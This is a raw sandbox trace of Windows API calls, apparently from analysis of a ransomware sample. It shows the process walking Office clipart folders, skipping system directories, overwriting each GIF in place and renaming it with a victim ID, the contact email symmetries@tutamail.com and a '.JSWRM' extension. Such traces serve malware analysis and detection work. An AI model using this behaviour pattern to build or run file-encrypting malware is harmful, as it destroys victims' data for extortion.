[0099.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0099.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143743.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143743.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0099.862] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3959) returned 1 [0099.862] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf70) returned 0x24d210 [0099.862] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0xf70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0xf70, lpOverlapped=0x0) returned 1 [0099.863] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.863] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0xf70, lpOverlapped=0x0) returned 1 [0099.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0099.864] CloseHandle (hObject=0x338) returned 1 [0099.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0099.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0099.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0099.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0099.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0099.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0099.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.864] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143743.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143743.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143743.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143743.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0099.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0099.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0099.865] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10c77030, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="J0143744.GIF", cAlternateFileName="")) returned 1 [0099.865] lstrcmpiW (lpString1="J0143744.GIF", lpString2=".") returned 1 [0099.865] lstrcmpiW (lpString1="J0143744.GIF", lpString2="..") returned 1 [0099.865] lstrcmpiW (lpString1="J0143744.GIF", lpString2="...") returned 1 [0099.865] lstrcmpiW (lpString1="J0143744.GIF", lpString2="windows") returned -1 [0099.865] lstrcmpiW (lpString1="J0143744.GIF", lpString2="recovery") returned -1 [0099.865] lstrcmpiW (lpString1="J0143744.GIF", lpString2="perflogs") returned -1 [0099.865] lstrcmpiW (lpString1="J0143744.GIF", lpString2="documents and settings") returned 1 [0099.865] lstrcmpiW (lpString1="J0143744.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.865] lstrcmpiW (lpString1="J0143744.GIF", lpString2="system volume information") returned -1 [0099.865] lstrcmpiW (lpString1="J0143744.GIF", lpString2="msocache") returned -1 [0099.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0099.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143744.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143744.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143744.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0099.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0099.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143744.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143744.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143744.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0099.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0099.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0099.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0099.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143744.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143744.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0099.866] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=47) returned 1 [0099.866] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0099.866] ReadFile (in: hFile=0x338, lpBuffer=0x241060, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x241060*, lpNumberOfBytesRead=0x345e534*=0x20, lpOverlapped=0x0) returned 1 [0099.867] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.867] WriteFile (in: hFile=0x338, lpBuffer=0x241060*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x241060*, lpNumberOfBytesWritten=0x345e530*=0x20, lpOverlapped=0x0) returned 1 [0099.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0099.867] CloseHandle (hObject=0x338) returned 1 [0099.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0099.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0099.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0099.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0099.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0099.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0099.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0099.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0099.868] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143744.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143744.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143744.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143744.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0099.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0099.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0099.868] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10c77030, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2dd, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="J0143745.GIF", cAlternateFileName="")) returned 1 [0099.869] lstrcmpiW (lpString1="J0143745.GIF", lpString2=".") returned 1 [0099.869] lstrcmpiW (lpString1="J0143745.GIF", lpString2="..") returned 1 [0099.869] lstrcmpiW (lpString1="J0143745.GIF", lpString2="...") returned 1 [0099.869] lstrcmpiW (lpString1="J0143745.GIF", lpString2="windows") returned -1 [0099.869] lstrcmpiW (lpString1="J0143745.GIF", lpString2="recovery") returned -1 [0099.869] lstrcmpiW (lpString1="J0143745.GIF", lpString2="perflogs") returned -1 [0099.869] lstrcmpiW (lpString1="J0143745.GIF", lpString2="documents and settings") returned 1 [0099.869] lstrcmpiW (lpString1="J0143745.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.869] lstrcmpiW (lpString1="J0143745.GIF", lpString2="system volume information") returned -1 [0099.869] lstrcmpiW (lpString1="J0143745.GIF", lpString2="msocache") returned -1 [0099.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143745.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143745.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143745.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0099.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143745.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143745.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143745.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0099.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0099.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0099.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0099.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143745.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143745.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0099.870] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=733) returned 1 [0099.870] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d0) returned 0x20b1f8 [0099.870] ReadFile (in: hFile=0x338, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x2d0, lpOverlapped=0x0) returned 1 [0099.920] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.920] WriteFile (in: hFile=0x338, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x2d0, lpOverlapped=0x0) returned 1 [0099.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.921] CloseHandle (hObject=0x338) returned 1 [0099.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0099.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0099.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0099.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0099.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0099.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0099.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.921] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143745.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143745.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143745.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143745.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0099.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0099.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0099.922] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10c77030, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x595, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="J0143746.GIF", cAlternateFileName="")) returned 1 [0099.922] lstrcmpiW (lpString1="J0143746.GIF", lpString2=".") returned 1 [0099.922] lstrcmpiW (lpString1="J0143746.GIF", lpString2="..") returned 1 [0099.922] lstrcmpiW (lpString1="J0143746.GIF", lpString2="...") returned 1 [0099.922] lstrcmpiW (lpString1="J0143746.GIF", lpString2="windows") returned -1 [0099.922] lstrcmpiW (lpString1="J0143746.GIF", lpString2="recovery") returned -1 [0099.923] lstrcmpiW (lpString1="J0143746.GIF", lpString2="perflogs") returned -1 [0099.923] lstrcmpiW (lpString1="J0143746.GIF", lpString2="documents and settings") returned 1 [0099.923] lstrcmpiW (lpString1="J0143746.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.923] lstrcmpiW (lpString1="J0143746.GIF", lpString2="system volume information") returned -1 [0099.923] lstrcmpiW (lpString1="J0143746.GIF", lpString2="msocache") returned -1 [0099.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143746.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143746.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143746.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143746.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143746.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143746.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0099.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0099.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0099.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143746.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0099.924] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1429) returned 1 [0099.924] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x590) returned 0x2332c0 [0099.924] ReadFile (in: hFile=0x338, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x590, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e534*=0x590, lpOverlapped=0x0) returned 1 [0099.925] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.925] WriteFile (in: hFile=0x338, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e530*=0x590, lpOverlapped=0x0) returned 1 [0099.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0099.926] CloseHandle (hObject=0x338) returned 1 [0099.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0099.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.926] 